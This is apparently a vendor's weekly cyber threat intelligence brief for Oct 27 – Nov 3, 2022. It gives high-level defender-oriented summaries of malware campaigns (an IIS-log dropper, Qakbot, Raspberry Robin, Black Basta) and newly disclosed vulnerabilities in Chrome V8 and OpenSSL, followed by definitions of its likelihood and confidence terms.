Cyber Intel Brief: Oct 27 – Nov 3, 2022

Malware

IIS Logs Used to Execute Commands to Install Malware

Impacted Industries: All

What You Need To Know:

Symantec has discovered a previously unknown dropper that reads HTTP requests logged by an Internet Information Services (IIS) server for commands to drop additional malware, including a publicly available backdoor and a previously unknown backdoor. The HTTP request includes three specific strings that don’t usually appear in IIS log files. The malware is saved as .ashx files to an arbitrary folder determined by the HTTP request parameter.

Analyst Note: The threat actors likely targeted the organization because they were likely running a misconfigured or vulnerable IIS server. One of the backdoors was a webshell that creates a SOCKS proxy which establishes a TCP connection to another server behind the firewall on the client’s behalf, exchanging network packets between the client and the server. Considering the threat landscape is so broad, the threat actors likely employed (or will) other types of malware besides those detailed by Symantec, and additional HTTP request commands may exist.


Malware

Qakbot Malware Infection Analysis

Impacted Industries: All

What You Need To Know:

The DFIR Report details a recent Qakbot infection where the threat actor used a malicious Word document, likely sent as a phishing email as part of an email thread that exploited the CVE-2022-30190 (Follina) vulnerability. The threat actor employed several techniques and legitimate tools as part of the infection chain.

Analyst Note: Ransomware threat actors have been observed using Qakbot or QBot as an initial entry vector to start their ransomware activity. DFIR report assessed that the threat actors likely employed thread-hijacked emails and the malicious Word document was in the OOXML format, which uses a ZIP archive to store the associated files and folders. These factors could have allowed the emails to bypass email security solutions. The threat actors will likely employ the same techniques and tools in future campaigns. However, depending on the target and environment, they may alter the infection chain and the tools used.


Malware

Fauppod Malware Creates Raspberry Robin

Impacted Industries: All

What You Need To Know:

Microsoft identified a heavily obfuscated DLL sample on hosts infected with Raspberry Robin or Fauppod malware. While analyzing these DLL samples, Microsoft noted that several created LNK files on external USB drives. Microsoft currently assesses that these DLLs are responsible for spreading Raspberry Robin LNK files to USB drives. Microsoft also estimates that the Fauppod samples are now the earliest known point in the attack chain for propagating Raspberry Robin infections to targets.

Analyst Note: The threat actors behind the Fauppod malware likely use Raspberry Robin to spread the infection to additional targets indiscriminately. Evidence exists that links the development of Raspberry Robin to EvilCorp. It is also possible that Fauppod, therefore Raspberry Robin, is part of a Loader-as-a-Service potentially operated by EvilCorp. According to Microsoft, nearly 3,000 devices in almost 1,000 organizations have seen at least one Raspberry Robin payload-related Microsoft Defender alert in the last 30 days. The threat groups and malware deployed post-Fauppod and Raspberry Robin will likely expand as infected devices grow.


Exploited Vulnerabilities

CISA Adds 1 CVE to its Known Exploited Vulnerabilities Catalog

Impacted Industries: All

What You Need To Know:

Based on the evidence of active exploitation, CISA has added one vulnerability (CVE-2022-3723) to its Known Exploited Vulnerabilities Catalog. The software affected is Google’s Chromium V8 Engine, a type confusion in V8 in Google Chrome before 107.0.5304.87. It could allow a remote attacker to exploit heap corruption via a crafted HTML page if successfully exploited.

Analyst Note: The exploitation of publicly-facing applications is routinely reported as one of the top initial infection vectors by multiple sources. Threat actors will likely ramp up exploitation efforts of the newly listed vulnerabilities within the next two weeks. However, we can not rule the possibility that threat actors could switch to other tactics & techniques to gain initial access. We base this assessment on CISA documenting the vulnerabilities in their Exploited Vulnerabilities Catalog and the likelihood that organizations will prioritize remediation of these vulnerabilities.


Vulnerabilities

Critical OpenSSL Vulnerability Downgraded to High

Impacted Industries: All

What You Need To Know:

The OpenSSL Project has released details and downgraded CVE-2022-3602 to high severity after the prenotification of a security fix for a critical vulnerability in OpenSSL 3.0.0 – 3.0.6 on October 25. Threat actors could exploit the vulnerability by sending an X.509 certificate with a specially crafted email address to a vulnerable client or server. However, the vulnerability occurs after certificate verification, requiring either a certificate authority to have signed the malicious certificate or the application to continue certificate verification despite failure to construct a path to a trusted issuer.

Analyst Note: OpenSSL downgraded the vulnerability severity rating because they felt that the vulnerability no longer met their security policy that “remote code execution is considered likely in common situations.” Threat actors will likely develop exploit code for the vulnerability. However, widespread exploitation attempts are not expected due to many modern platforms implementing stack overflow protections which would result in a crash instead. However, on certain Linux distributions, nothing would happen as the buffer overflow is on bytes not used.


Ransomware

Are Fin7 and Black Basta Working Together

Impacted Industries: All

What You Need To Know:

SentinelOne discovered a custom defense impairment tool, packed by an unknown packer, used exclusively in Black Basta incidents. Black Basta operators also used this unknown packer on a backdoor that FIN7 uses. Based on this and several other pieces of evidence detailed in their report, they assess that the BlackBasta ransomware operations are highly likely to have ties with FIN7.

Analyst Note: According to SentinelOne’s research, Black Basta ransomware operators develop and maintain their toolkit and either exclude or only collaborate with a limited and trusted set of affiliates. SentinelOne notes in their report that Black Basta operators compromised over 90 organizations between April and September 2022. Considering relatively few operators are behind Black Basta incidents, one of which may be FIN7. These operators will likely use the TTPs, tools, and other indicators detailed by SentinelOne in future campaigns.


What We Mean When We Say

Estimates of Likelihood

We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not. Terms like “might” reflect situations where we are unable to assess the likelihood, usually due to a lack of relevant information, which is sketchy or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or distant event with significant consequences.

Confidence in Assessments

Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:

  • High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
  • Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
  • Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.

Share

LinkedIn Twitter YouTube

Subscribe to the Deepwatch Insights Blog